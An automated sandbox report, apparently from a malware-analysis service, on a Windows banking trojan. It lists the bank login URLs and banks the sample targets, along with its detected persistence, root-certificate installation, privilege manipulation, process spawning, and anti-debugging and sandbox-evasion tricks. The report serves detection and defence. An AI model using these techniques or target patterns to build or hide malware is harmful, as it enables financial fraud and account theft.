Source: ucE7u0vttK.exe, 00000004.00000002.14089625838.01B0E000.00000004.sdmpString found in binary or memory: *ce2bb103af1a10241de273caa885dbdd*
Source: ucE7u0vttK.exe, 00000004.00000002.14089625838.01B0E000.00000004.sdmpString found in binary or memory: *843729ac35951a040681c469b4a89c0b*
Source: ucE7u0vttK.exe, 00000004.00000002.14089625838.01B0E000.00000004.sdmpString found in binary or memory: */EBC_EBC1961/*
Source: ucE7u0vttK.exe, 00000004.00000002.14089625838.01B0E000.00000004.sdmpString found in binary or memory: *.com/SPF/Login/favicon.ico?*
Source: ucE7u0vttK.exe, 00000004.00000002.14089625838.01B0E000.00000004.sdmpString found in binary or memory: *f7205f82fdf9559db38d202eb9459348*
Source: ucE7u0vttK.exe, 00000004.00000002.14089625838.01B0E000.00000004.sdmpString found in binary or memory: *ff358d7f67bc0f7e81b014655e34d0a5*
Source: ucE7u0vttK.exe, 00000004.00000002.14089625838.01B0E000.00000004.sdmpString found in binary or memory: */business/j_security_check*
Source: ucE7u0vttK.exe, 00000004.00000002.14089625838.01B0E000.00000004.sdmpString found in binary or memory: *8735fa9cc59a7353f49756e81c2b3908*
Source: ucE7u0vttK.exe, 00000004.00000002.14089625838.01B0E000.00000004.sdmpString found in binary or memory: *engine/login/businesslogin*
Source: ucE7u0vttK.exe, 00000004.00000002.14089625838.01B0E000.00000004.sdmpString found in binary or memory: */Accounts/AccountOverview.asp*
Source: ucE7u0vttK.exe, 00000004.00000002.14089625838.01B0E000.00000004.sdmpString found in binary or memory: *partnersfcu.org/OnlineBanking/*aspx*
Source: ucE7u0vttK.exe, 00000004.00000002.14089625838.01B0E000.00000004.sdmpString found in binary or memory: *01390a8c1c3cfb9918d799ad2a73dd84*
Source: ucE7u0vttK.exe, 00000004.00000002.14089625838.01B0E000.00000004.sdmpString found in binary or memory: */Authentication/Login*
Source: ucE7u0vttK.exe, 00000004.00000002.14089625838.01B0E000.00000004.sdmpString found in binary or memory: *.com/pub/html/login.html*
Source: ucE7u0vttK.exe, 00000004.00000002.14089625838.01B0E000.00000004.sdmpString found in binary or memory: *.com/SPF/Login/Auth.aspx*
Source: ucE7u0vttK.exe, 00000004.00000002.14089625838.01B0E000.00000004.sdmpString found in binary or memory: https://www.wellsfargo.com/biz/
Source: ucE7u0vttK.exe, 00000004.00000002.14089625838.01B0E000.00000004.sdmpString found in binary or memory: *250717644273414e5c73a3c8997564da*
Source: ucE7u0vttK.exe, 00000004.00000002.14089625838.01B0E000.00000004.sdmpString found in binary or memory: *f7caf50483938302d86aa228d161e435*
Source: ucE7u0vttK.exe, 00000004.00000002.14089625838.01B0E000.00000004.sdmpString found in binary or memory: *.ebanking-services.com/*/*favicon.ico*
Source: ucE7u0vttK.exe, 00000004.00000002.14089625838.01B0E000.00000004.sdmpString found in binary or memory: *74536be4f9c2db6ca8c01a8054e1338a*
Source: ucE7u0vttK.exe, 00000004.00000002.14089625838.01B0E000.00000004.sdmpString found in binary or memory: */bbw/cmserver/welcome*
Source: ucE7u0vttK.exe, 00000004.00000002.14089625838.01B0E000.00000004.sdmpString found in binary or memory: *99f2a20d3dd8a354fbc8ed3a239f199f*
Source: ucE7u0vttK.exe, 00000004.00000002.14089625838.01B0E000.00000004.sdmpString found in binary or memory: https://www.wellsfargo.com/
Found strings which match to known bank urlsShow sources
Source: ucE7u0vttK.exe, 00000004.00000002.14089625838.01B0E000.00000004.sdmpString found in binary or memory: bankleumi equals www.bankleumi.co.il (Bank Leumi le-Israel)
Source: ucE7u0vttK.exe, 00000004.00000003.13183440428.01B49000.00000004.sdmpString found in binary or memory: bankofamerica equals www.bankofamerica.com (Bank of America)
Source: ucE7u0vttK.exe, 00000004.00000003.13188769124.01B49000.00000004.sdmpString found in binary or memory: bankofscotland equals www.bankofscotland.co.uk (Bank of Scotland)
Source: ucE7u0vttK.exe, 00000004.00000003.13188769124.01B49000.00000004.sdmpString found in binary or memory: barclays equals www.barclays.com (Barclays Bank)
Source: ucE7u0vttK.exe, 00000004.00000003.13188769124.01B49000.00000004.sdmpString found in binary or memory: bnpparibas equals www.bnpparibas.com (BNP Paribas)
Source: ucE7u0vttK.exe, 00000004.00000003.13188769124.01B49000.00000004.sdmpString found in binary or memory: co-operativebank equals www.co-operativebank.co.uk (Co-operative Bank)
Source: ucE7u0vttK.exe, 00000004.00000003.13183440428.01B49000.00000004.sdmpString found in binary or memory: commerzbank equals www.commerzbank.com (Commerzbank)
Source: ucE7u0vttK.exe, 00000004.00000003.13188769124.01B49000.00000004.sdmpString found in binary or memory: danskebank equals www.danskebank.com (Den Danske Bank)
Source: ucE7u0vttK.exe, 00000004.00000003.13188769124.01B49000.00000004.sdmpString found in binary or memory: deutsche-bank equals www.deutsche-bank.de (Deutsche Bank AG)
Source: ucE7u0vttK.exe, 00000004.00000003.13188769124.01B49000.00000004.sdmpString found in binary or memory: firstdirect equals www.firstdirect.co.uk (First Direct)
Source: ucE7u0vttK.exe, 00000004.00000002.14089625838.01B0E000.00000004.sdmpString found in binary or memory: icicibank equals www.icicibank.com (ICICI Bank)
Source: ucE7u0vttK.exe, 00000004.00000003.13188769124.01B49000.00000004.sdmpString found in binary or memory: santander equals www.santander.de (Santander Direkt Bank AG)
Source: ucE7u0vttK.exe, 00000004.00000003.13188769124.01B49000.00000004.sdmpString found in binary or memory: statestreet equals www.statestreet.com (State Street Corporation)
Source: ucE7u0vttK.exe, 00000004.00000003.13183440428.01B49000.00000004.sdmpString found in binary or memory: targobank equals www.targobank.de (Targo Bank)
Source: ucE7u0vttK.exe, 00000004.00000002.14089625838.01B0E000.00000004.sdmpString found in binary or memory: turkishbank equals www.turkishbank.com (Turkish Bank Group)
Source: ucE7u0vttK.exe, 00000004.00000003.13188769124.01B49000.00000004.sdmpString found in binary or memory: ulsterbank equals www.ulsterbank.com (Ulster Bank)
Source: ucE7u0vttK.exe, 00000004.00000002.14089625838.01B0E000.00000004.sdmp, ucE7u0vttK.exe, 00000004.00000003.13183440428.01B49000.00000004.sdmpString found in binary or memory: wellsfargo equals www.wellsfargo.com (Wells Fargo Bank)

Spam, unwanted Advertisements and Ransom Demands:

barindex
Contains functionality to import cryptographic keys (often used in ransomware)Show sources
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeCode function: 2_2_003C76E0 CryptAcquireContextW,CryptImportKey,CryptSetKeyParam,CryptSetKeyParam,memcpy,CryptDecrypt,CryptDestroyKey,CryptReleaseContext,2_2_003C76E0
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeCode function: 2_2_003DEF6B CryptAcquireContextA,CryptImportKey,CryptSetKeyParam,memcpy,CryptEncrypt,CryptDecrypt,CryptDestroyKey,CryptReleaseContext,memcpy,CryptDestroyKey,CryptReleaseContext,2_2_003DEF6B
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeCode function: 2_2_003D3BB7 CryptAcquireContextA,CryptEncrypt,CryptDestroyKey,CryptImportKey,CryptReleaseContext,CryptDestroyKey,CryptReleaseContext,2_2_003D3BB7
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeCode function: 4_2_003976E0 CryptAcquireContextW,CryptImportKey,CryptSetKeyParam,CryptSetKeyParam,memcpy,CryptDecrypt,CryptDestroyKey,CryptReleaseContext,4_2_003976E0
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeCode function: 4_2_003AEF6B CryptAcquireContextA,CryptImportKey,CryptSetKeyParam,memcpy,CryptEncrypt,CryptDecrypt,CryptDestroyKey,CryptReleaseContext,memcpy,CryptDestroyKey,CryptReleaseContext,4_2_003AEF6B
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeCode function: 4_2_003A3BB7 CryptAcquireContextA,CryptEncrypt,CryptDestroyKey,CryptImportKey,CryptReleaseContext,CryptDestroyKey,CryptReleaseContext,4_2_003A3BB7

System Summary:

barindex
PE file has a writeable .text sectionShow sources
Source: ucD6u0vstJ.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: ucE7u0vttK.exe.1.drStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Contains functionality to call native functionsShow sources
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeCode function: 2_2_00437B9E GetCurrentProcess,LoadLibraryA,GetProcAddress,GetProcAddress,NtQueryInformationProcess,2_2_00437B9E
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeCode function: 2_2_003C6740 NtQueryInformationProcess,2_2_003C6740
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeCode function: 4_2_00396740 NtQueryInformationProcess,NtQueryInformationProcess,4_2_00396740
Contains functionality to launch a process as a different userShow sources
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeCode function: 2_2_003CC320 GetStartupInfoW,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetCurrentProcess,LookupPrivilegeValueW,AdjustTokenPrivileges,RevertToSelf,DuplicateTokenEx,CloseHandle,GetTokenInformation,GetLastError,GetTokenInformation,LookupAccountSidW,CreateProcessAsUserW,CloseHandle,AdjustTokenPrivileges,CloseHandle,2_2_003CC320
Creates mutexesShow sources
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMutant created: \Sessions\1\BaseNamedObjects\789C000000000
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMutant created: \BaseNamedObjects\789C000000000
Detected potential crypto functionShow sources
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeCode function: 2_2_003DE04D2_2_003DE04D
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeCode function: 2_2_003D98852_2_003D9885
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeCode function: 2_2_003DD4812_2_003DD481
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeCode function: 2_2_003D257B2_2_003D257B
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeCode function: 2_2_003D69E72_2_003D69E7
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeCode function: 2_2_003D39C02_2_003D39C0
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeCode function: 2_2_003D8A1C2_2_003D8A1C
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeCode function: 2_2_003D9F4C2_2_003D9F4C
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeCode function: 2_2_003D6BFB2_2_003D6BFB
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeCode function: 2_2_003D1FE02_2_003D1FE0
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeCode function: 4_2_003AE04D4_2_003AE04D
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeCode function: 4_2_003AD4814_2_003AD481
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeCode function: 4_2_003A98854_2_003A9885
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeCode function: 4_2_003A257B4_2_003A257B
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeCode function: 4_2_003A69E74_2_003A69E7
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeCode function: 4_2_003A39C04_2_003A39C0
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeCode function: 4_2_003A8A1C4_2_003A8A1C
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeCode function: 4_2_003A9F4C4_2_003A9F4C
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeCode function: 4_2_003A6BFB4_2_003A6BFB
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeCode function: 4_2_003A1FE04_2_003A1FE0
PE file does not import any functionsShow sources
Source: ucE7u0vttK.exe.1.drStatic PE information: No import functions for PE file found
Source: ucD6u0vstJ.exeStatic PE information: No import functions for PE file found
Reads the hosts fileShow sources
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Sample reads its own file contentShow sources
Source: C:\Users\user\Desktop\ucD6u0vstJ.exeFile read: C:\Users\user\Desktop\ucD6u0vstJ.exeJump to behavior
PE file has an executable .text section which is very likely to contain packed code (zlib compression ratio < 0.3)Show sources
Source: ucD6u0vstJ.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: ucE7u0vttK.exe.1.drStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Classification labelShow sources
Source: classification engineClassification label: mal100.phis.troj.spyw.evad.winEXE@10/16@2/5
Contains functionality to adjust token privileges (e.g. debug / backup)Show sources
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeCode function: 2_2_003E1FF0 LookupPrivilegeValueW,AdjustTokenPrivileges,AdjustTokenPrivileges,GetLastError,2_2_003E1FF0
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeCode function: 2_2_003CF990 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetCurrentProcess,LookupPrivilegeValueW,AdjustTokenPrivileges,RevertToSelf,DuplicateTokenEx,CloseHandle,AdjustTokenPrivileges,CloseHandle,2_2_003CF990
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeCode function: 2_2_003CC320 GetStartupInfoW,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetCurrentProcess,LookupPrivilegeValueW,AdjustTokenPrivileges,RevertToSelf,DuplicateTokenEx,CloseHandle,GetTokenInformation,GetLastError,GetTokenInformation,LookupAccountSidW,CreateProcessAsUserW,CloseHandle,AdjustTokenPrivileges,CloseHandle,2_2_003CC320
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeCode function: 4_2_0039C320 GetStartupInfoW,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetCurrentProcess,LookupPrivilegeValueW,LookupPrivilegeValueW,AdjustTokenPrivileges,AdjustTokenPrivileges,RevertToSelf,DuplicateTokenEx,CloseHandle,GetTokenInformation,GetTokenInformation,GetLastError,GetTokenInformation,GetTokenInformation,LookupAccountSidW,CreateProcessAsUserW,CreateProcessAsUserW,CloseHandle,AdjustTokenPrivileges,AdjustTokenPrivileges,CloseHandle,4_2_0039C320
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeCode function: 4_2_0039F990 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetCurrentProcess,LookupPrivilegeValueW,AdjustTokenPrivileges,RevertToSelf,DuplicateTokenEx,CloseHandle,AdjustTokenPrivileges,CloseHandle,4_2_0039F990
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeCode function: 4_2_003B1FF0 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,4_2_003B1FF0
Contains functionality to enum processes or threadsShow sources
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeCode function: 2_2_003C7850 CreateToolhelp32Snapshot,Process32FirstW,lstrcmpiW,Process32NextW,OpenProcess,CloseHandle,2_2_003C7850
Contains functionality to instantiate COM classesShow sources
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeCode function: 2_2_003CE850 CoCreateInstance,CoCreateInstance,CoCreateInstance,2_2_003CE850
Contains functionality to load and extract PE file embedded resourcesShow sources
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeCode function: 2_2_003CF550 FindResourceW,LoadResource,LockResource,2_2_003CF550
Creates files inside the user directoryShow sources
Source: C:\Users\user\Desktop\ucD6u0vstJ.exeFile created: C:\Users\user\AppData\Roaming\freenetJump to behavior
PE file has an executable .text section and no other executable sectionShow sources
Source: ucD6u0vstJ.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Queries process information (via WMI, Win32_Process)Show sources
Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
Reads software policiesShow sources
Source: C:\Users\user\Desktop\ucD6u0vstJ.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Spawns processesShow sources
Source: unknownProcess created: C:\Users\user\Desktop\ucD6u0vstJ.exe 'C:\Users\user\Desktop\ucD6u0vstJ.exe'
Source: unknownProcess created: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exe C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exe
Source: unknownProcess created: C:\Windows\System32\taskeng.exe taskeng.exe {2B3EACB2-7281-44E8-9006-229A29FB4963} S-1-5-18:NT AUTHORITY\System:Service:
Source: unknownProcess created: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exe C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exe
Source: unknownProcess created: C:\Windows\System32\svchost.exe svchost.exe
Source: unknownProcess created: C:\Windows\System32\svchost.exe svchost.exe
Source: C:\Users\user\Desktop\ucD6u0vstJ.exeProcess created: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exe C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeJump to behavior
Source: C:\Windows\System32\taskeng.exeProcess created: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exe C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exe Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeProcess created: C:\Windows\System32\svchost.exe svchost.exeJump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeProcess created: C:\Windows\System32\svchost.exe svchost.exeJump to behavior
Uses an in-process (OLE) Automation serverShow sources
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32Jump to behavior
Binary contains paths to debug symbolsShow sources
Source: Binary string: C:\Work\A_Modules\Sysinfo\x86\Release\GetSystemInfo.pdbHS source: ucE7u0vttK.exe, 00000004.00000002.14089625838.01B0E000.00000004.sdmp, svchost.exe, 00000007.00000000.13006790928.10001000.00000004.sdmp
Source: Binary string: C:\Work\A_Modules\Sysinfo\x86\Release\GetSystemInfo.pdb source: ucE7u0vttK.exe, 00000004.00000002.14089625838.01B0E000.00000004.sdmp, svchost.exe, 00000007.00000000.13006790928.10001000.00000004.sdmp

Data Obfuscation:

barindex
Contains functionality to dynamically determine API callsShow sources
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeCode function: 2_2_00437B9E GetCurrentProcess,LoadLibraryA,GetProcAddress,GetProcAddress,NtQueryInformationProcess,2_2_00437B9E
Uses code obfuscation techniques (call, push, ret)Show sources
Source: C:\Users\user\Desktop\ucD6u0vstJ.exeCode function: 1_2_0043921B push ebx; ret 1_2_0043921D
Source: C:\Users\user\Desktop\ucD6u0vstJ.exeCode function: 1_2_0043911D push esp; retf 1_2_0043911E
Source: C:\Users\user\Desktop\ucD6u0vstJ.exeCode function: 1_2_004392D5 push esp; retf 1_2_004392D6
Source: C:\Users\user\Desktop\ucD6u0vstJ.exeCode function: 1_2_00435EBE push eax; ret 1_2_00435ED1
Source: C:\Users\user\Desktop\ucD6u0vstJ.exeCode function: 1_1_0043921B push ebx; ret 1_1_0043921D
Source: C:\Users\user\Desktop\ucD6u0vstJ.exeCode function: 1_1_0043911D push esp; retf 1_1_0043911E
Source: C:\Users\user\Desktop\ucD6u0vstJ.exeCode function: 1_1_004392D5 push esp; retf 1_1_004392D6
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeCode function: 2_2_00438844 push eax; retf 2_2_0043884F
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeCode function: 2_2_0043921B push ebx; ret 2_2_0043921D
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeCode function: 2_2_004392D5 push esp; retf 2_2_004392D6
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeCode function: 2_2_00437A83 push esp; retf 2_2_00437A84
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeCode function: 2_2_00438C8D push cs; retf 2_2_00438D1D
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeCode function: 2_2_0043911D push esp; retf 2_2_0043911E
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeCode function: 2_2_00438D27 push cs; retf 2_2_00438D1D
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeCode function: 2_2_003E2829 push ecx; ret 2_2_003E283C
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeCode function: 4_2_003B2829 push ecx; ret 4_2_003B283C
Binary may include packed or encrypted codeShow sources
Source: initial sampleStatic PE information: section name: .text entropy: 7.94542714575
Source: initial sampleStatic PE information: section name: .text entropy: 7.94542714575

Persistence and Installation Behavior:

barindex
Installs new ROOT certificatesShow sources
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 BlobJump to behavior
Drops PE filesShow sources
Source: C:\Users\user\Desktop\ucD6u0vstJ.exeFile created: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeJump to dropped file

Hooking and other Techniques for Hiding and Protection:

barindex
Extensive use of GetProcAddress (often used to hide API calls)Show sources
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeCode function: 2_2_003CEB30 GetVersion,LoadLibraryW,LoadLibraryW,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,FreeLibrary,FreeLibrary,2_2_003CEB30
Disables application error messsages (SetErrorMode)Show sources
Source: C:\Users\user\Desktop\ucD6u0vstJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\ucD6u0vstJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\ucD6u0vstJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

Malware Analysis System Evasion:

barindex
Delayed program exit foundShow sources
Source: C:\Users\user\Desktop\ucD6u0vstJ.exeCode function: 1_2_00435977 Sleep,ExitProcess,1_2_00435977
Source: C:\Users\user\Desktop\ucD6u0vstJ.exeCode function: 1_2_00435A1B Sleep,ExitProcess,1_2_00435A1B
Source: C:\Users\user\Desktop\ucD6u0vstJ.exeCode function: 1_2_00435996 Sleep,ExitProcess,1_2_00435996
Found evasive API chain (may stop execution after checking mutex)Show sources
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeEvasive API call chain: CreateMutex,DecisionNodes,ExitProcessgraph_2-14350
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)Show sources
Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_ComputerSystem
Contains functionality for execution timing, often used to detect debuggersShow sources
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeCode function: 2_2_003E1250 rdtsc 2_2_003E1250
Contains functionality to query network adapater informationShow sources
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeCode function: GetAdaptersInfo,GetAdaptersInfo,2_2_003D0C80
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeCode function: GetAdaptersInfo,GetAdaptersInfo,GetAdaptersInfo,4_2_003A0C80
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)Show sources
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeWindow / User API: threadDelayed 1000Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeWindow / User API: threadDelayed 999Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeWindow / User API: threadDelayed 366Jump to behavior
Source: C:\Windows\System32\svchost.exeWindow / User API: threadDelayed 1158Jump to behavior
Found evasive API chain checking for process token informationShow sources
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_2-14779
May sleep (evasive loops) to hinder dynamic analysisShow sources
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exe TID: 3496Thread sleep count: 1000 > 30Jump to behavior
Source: C:\Windows\System32\taskeng.exe TID: 3560Thread sleep time: -120000s >= -60000sJump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exe TID: 3572Thread sleep count: 999 > 30Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exe TID: 3656Thread sleep count: 366 > 30Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exe TID: 3656Thread sleep time: -366000s >= -60000sJump to behavior
Source: C:\Windows\System32\svchost.exe TID: 3784Thread sleep time: -180000s >= -60000sJump to behavior
Source: C:\Windows\System32\svchost.exe TID: 3968Thread sleep count: 71 > 30Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 3968Thread sleep time: -710000s >= -60000sJump to behavior
Source: C:\Windows\System32\svchost.exe TID: 3968Thread sleep count: 1158 > 30Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 3968Thread sleep time: -347400s >= -60000sJump to behavior
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)Show sources
Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
Sample execution stops while process was sleeping (likely an evasion)Show sources
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeLast function: Thread delayed
Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
Contains functionality to enumerate / list files inside a directoryShow sources
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeCode function: 2_2_003C2450 GetFullPathNameW,PathAddBackslashW,FindFirstFileW,FindNextFileW,GetLastError,FindClose,2_2_003C2450
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeCode function: 4_2_00392450 GetFullPathNameW,PathAddBackslashW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindNextFileW,GetLastError,FindClose,4_2_00392450
Contains functionality to query system informationShow sources
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeCode function: 2_2_003C4A10 GetVersionExW,GetModuleHandleW,GetProcAddress,GetSystemInfo,2_2_003C4A10
Program exit pointsShow sources
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeAPI call chain: ExitProcess graph end nodegraph_2-14266
Queries a list of all running processesShow sources
Source: C:\Windows\System32\svchost.exeProcess information queried: ProcessInformationJump to behavior

Anti Debugging:

barindex
Checks for kernel debuggers (NtQuerySystemInformation(SystemKernelDebuggerInformation))Show sources
Source: C:\Windows\System32\taskeng.exeSystem information queried: KernelDebuggerInformationJump to behavior
Contains functionality for execution timing, often used to detect debuggersShow sources
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeCode function: 2_2_003E1250 rdtsc 2_2_003E1250
Contains functionality to dynamically determine API callsShow sources
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeCode function: 2_2_00437B9E GetCurrentProcess,LoadLibraryA,GetProcAddress,GetProcAddress,NtQueryInformationProcess,2_2_00437B9E
Contains functionality which may be used to detect a debugger (GetProcessHeap)Show sources
